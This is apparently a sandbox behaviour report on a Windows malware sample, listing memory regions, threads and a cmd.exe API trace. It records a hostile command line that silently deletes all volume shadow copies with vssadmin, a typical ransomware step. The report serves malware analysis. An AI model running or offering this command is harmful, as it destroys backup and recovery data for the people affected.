	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 4575
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 4576
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 4581
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 4582
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 4583
	        start_va = 0x7a0000
	          end_va = 0x7dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007a0000"
	        filename = ""

Region:
	              id = 4584
	        start_va = 0x480000
	          end_va = 0x607fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000480000"
	        filename = ""

Region:
	              id = 4585
	        start_va = 0x7a0000
	          end_va = 0x7c9fff
	       monitored = 0
	     entry_point = 0x7a5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4586
	        start_va = 0x7d0000
	          end_va = 0x7dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007d0000"
	        filename = ""

Region:
	              id = 4587
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4594
	        start_va = 0x7a0000
	          end_va = 0x7acfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 4595
	        start_va = 0x4a80000
	          end_va = 0x4c00fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a80000"
	        filename = ""

Region:
	              id = 4596
	        start_va = 0x4c10000
	          end_va = 0x600ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004c10000"
	        filename = ""

Region:
	              id = 4597
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 4598
	        start_va = 0x1d0000
	          end_va = 0x1d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001d0000"
	        filename = ""

Region:
	              id = 4599
	        start_va = 0x7b0000
	          end_va = 0x7b3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007b0000"
	        filename = ""

Region:
	              id = 4600
	        start_va = 0x4880000
	          end_va = 0x4969fff
	       monitored = 0
	     entry_point = 0x48bd650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 4601
	        start_va = 0x4980000
	          end_va = 0x4a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004980000"
	        filename = ""

Region:
	              id = 4609
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 4923
	        start_va = 0x7c0000
	          end_va = 0x7c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007c0000"
	        filename = ""

Region:
	              id = 4924
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 4925
	        start_va = 0x7e0000
	          end_va = 0x7e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007e0000"
	        filename = ""

Region:
	              id = 5006
	        start_va = 0x610000
	          end_va = 0x64ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 5007
	        start_va = 0x650000
	          end_va = 0x68ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000650000"
	        filename = ""

Region:
	              id = 5012
	        start_va = 0x690000
	          end_va = 0x6cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 5013
	        start_va = 0x6d0000
	          end_va = 0x70ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006d0000"
	        filename = ""

Region:
	              id = 5014
	        start_va = 0x710000
	          end_va = 0x74ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000710000"
	        filename = ""

Region:
	              id = 5015
	        start_va = 0x750000
	          end_va = 0x78ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000750000"
	        filename = ""

Region:
	              id = 5081
	        start_va = 0x4880000
	          end_va = 0x495ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 5082
	        start_va = 0x6010000
	          end_va = 0x608ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006010000"
	        filename = ""

Region:
	              id = 5083
	        start_va = 0x7f0000
	          end_va = 0x7f8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 340
	os_tid = 0x1124


Thread:
	id = 342
	os_tid = 0x11fc


Thread:
	id = 368
	os_tid = 0x888


Thread:
	id = 369
	os_tid = 0x129c


Thread:
	id = 370
	os_tid = 0x1054


Process:
	id = "61"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x3e2b4000"
	os_pid = "0x4f4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=I: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4625
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4626
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4627
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4628
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4629
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 4630
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 4631
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 4632
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 4633
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 4634
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 4635
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 4636
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4637
	        start_va = 0x7f510000
	          end_va = 0x7f532fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f510000"
	        filename = ""

Region:
	              id = 4638
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4639
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4640
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4641
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4642
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4643
	        start_va = 0x1c0000
	          end_va = 0x21ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4645
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4646
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4647
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4648
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4649
	        start_va = 0x4600000
	          end_va = 0x47affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 4650
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4651
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4652
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4653
	        start_va = 0x7f410000
	          end_va = 0x7f50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f410000"
	        filename = ""

Region:
	              id = 4868
	        start_va = 0x220000
	          end_va = 0x2ddfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4869
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4870
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4871
	        start_va = 0x210000
	          end_va = 0x21ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000210000"
	        filename = ""

Region:
	              id = 4872
	        start_va = 0x47b0000
	          end_va = 0x48affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047b0000"
	        filename = ""

Region:
	              id = 4873
	        start_va = 0x4350000
	          end_va = 0x435ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 4874
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 4933
	        start_va = 0x4370000
	          end_va = 0x4373fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004370000"
	        filename = ""

Region:
	              id = 4962
	        start_va = 0x48b0000
	          end_va = 0x4be6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 347
	os_tid = 0x698

	[0299.641] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0299.642] GetProcessHeap () returned 0x46b0000
	[0299.642] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x400a) returned 0x46bb998
	[0299.642] GetProcessHeap () returned 0x46b0000
	[0299.643] RtlFreeHeap (HeapHandle=0x46b0000, Flags=0x0, BaseAddress=0x46bb998) returned 1
	[0299.645] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0299.645] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0299.645] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0299.645] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0299.645] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0299.645] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0299.645] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0299.645] GetProcessHeap () returned 0x46b0000
	[0299.645] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x58) returned 0x46b9048
	[0299.645] GetProcessHeap () returned 0x46b0000
	[0299.646] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x1a) returned 0x46b7318
	[0299.648] GetProcessHeap () returned 0x46b0000
	[0299.648] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x52) returned 0x46b90a8
	[0299.650] GetConsoleTitleW (in: lpConsoleTitle=0x18f9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0299.908] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0299.908] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0299.908] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0299.908] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0299.908] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0299.909] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0299.910] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0299.911] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0299.912] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0299.913] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0299.914] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0299.916] GetProcessHeap () returned 0x46b0000
	[0299.916] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x210) returned 0x46b9108
	[0299.916] GetProcessHeap () returned 0x46b0000
	[0299.916] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x64) returned 0x46b9320
	[0299.916] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0299.917] GetProcessHeap () returned 0x46b0000
	[0299.917] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x418) returned 0x46b05c8
	[0299.917] SetErrorMode (uMode=0x0) returned 0x0
	[0299.918] SetErrorMode (uMode=0x1) returned 0x0
	[0299.918] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46b05d0, lpFilePart=0x18f4fc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f4fc*="Desktop") returned 0x1d
	[0299.918] SetErrorMode (uMode=0x0) returned 0x1
	[0299.918] GetProcessHeap () returned 0x46b0000
	[0299.918] RtlReAllocateHeap (Heap=0x46b0000, Flags=0x0, Ptr=0x46b05c8, Size=0x56) returned 0x46b05c8
	[0299.918] GetProcessHeap () returned 0x46b0000
	[0299.918] RtlSizeHeap (HeapHandle=0x46b0000, Flags=0x0, MemoryPointer=0x46b05c8) returned 0x56
	[0299.919] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0299.919] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0299.919] GetProcessHeap () returned 0x46b0000
	[0299.919] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x182) returned 0x46b9390
	[0299.919] GetProcessHeap () returned 0x46b0000
	[0299.919] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x2fc) returned 0x46b0628
	[0300.000] GetProcessHeap () returned 0x46b0000
	[0300.001] RtlReAllocateHeap (Heap=0x46b0000, Flags=0x0, Ptr=0x46b0628, Size=0x184) returned 0x46b0628
	[0300.001] GetProcessHeap () returned 0x46b0000
	[0300.001] RtlSizeHeap (HeapHandle=0x46b0000, Flags=0x0, MemoryPointer=0x46b0628) returned 0x184
	[0300.001] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0300.001] GetProcessHeap () returned 0x46b0000
	[0300.001] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0xe0) returned 0x46b9520
	[0300.151] GetProcessHeap () returned 0x46b0000
	[0300.151] RtlReAllocateHeap (Heap=0x46b0000, Flags=0x0, Ptr=0x46b9520, Size=0x76) returned 0x46b9520
	[0300.151] GetProcessHeap () returned 0x46b0000
	[0300.151] RtlSizeHeap (HeapHandle=0x46b0000, Flags=0x0, MemoryPointer=0x46b9520) returned 0x76
	[0300.153] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0300.154] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f288, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f288) returned 0xffffffff
	[0300.155] GetLastError () returned 0x2
	[0300.155] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0300.156] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f288, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f288) returned 0xffffffff
	[0300.158] GetLastError () returned 0x2
	[0300.158] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0300.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f288, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f288) returned 0x46b95a0
	[0300.159] GetProcessHeap () returned 0x46b0000
